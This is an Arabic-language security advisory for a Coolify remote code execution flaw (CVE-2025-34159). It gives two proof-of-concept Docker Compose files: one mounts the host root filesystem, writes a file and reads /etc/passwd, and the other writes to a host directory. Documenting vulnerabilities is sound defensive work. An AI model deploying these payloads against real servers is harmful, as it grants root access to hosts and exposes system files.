
توجد ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) في سير عمل نشر تطبيقات Coolify. يسمح هذا الخلل لعضو منخفض الامتياز بحقن توجيهات Docker Compose عشوائية أثناء إنشاء المشروع أو تحديثاته. من خلال تعريف خدمة خبيثة تقوم بتركيب نظام ملفات المضيف، يمكن للمهاجم تحقيق تنفيذ أوامر على مستوى الجذر على
| الحقل | القيمة |
|---|---|
| معرف CVE | CVE-2025-34159 |
| يؤثر على | Coolify ≤ v4.0.0-beta.420.6 |
| تم الإصلاح في | v4.0.0-beta.420.7 |
| الخطورة | حرجة |
| CVSS 4.0 | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| CWE | CWE-78 (حقن أوامر النظام), CWE-20 (التحقق غير السليم من المدخلات) |
توجد ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في سير عمل نشر التطبيقات في Coolify. تسمح هذه الثغرة لـ عضو ذي صلاحيات منخفضة بحقن توجيهات Docker Compose تعسفية أثناء إنشاء المشاريع أو تحديثها. من خلال تعريف خدمة خبيثة تقوم بتحميل نظام الملفات للمضيف، يمكن للمهاجم تحقيق تنفيذ أوامر على مستوى الجذر على نظام التشغيل المضيف، متجاوزًا بذلك عزل الحاويات تمامًا.
توجد الثغرة في سير عمل نشر المشروع حيث يتم معالجة تكوينات Docker Compose المقدمة من المستخدم دون التحقق الكافي أو وضعها في بيئة معزولة.
version: '3.8'
services:
poc-host-root:
image: alpine:3.19
tty: true
volumes:
- /:/host:rw
command: >
sh -c "
echo '[*] Proof of RCE on host' &&
echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
whoami &&
id &&
uname -a &&
head -n 5 /host/etc/passwd
"
النتيجة: بعد النشر، يظهر الملف /tmp/proof_rce.txt على النظام المضيف، مما يؤكد RCE بصلاحيات الجذر.
version: '3.8'
services:
poc-host-write:
image: alpine:3.19
tty: true
volumes:
- /home/eyodav/PoC:/host
command: >
sh -c "
set -e;
mkdir -p /host &&
echo '[*] Writing PoC file to host mount...' &&
echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
cd /host &&
pwd &&
ls -la
"
/tmp/proof_rce.txt) أو مراجعة مخرجات الأوامر في سجلات النشر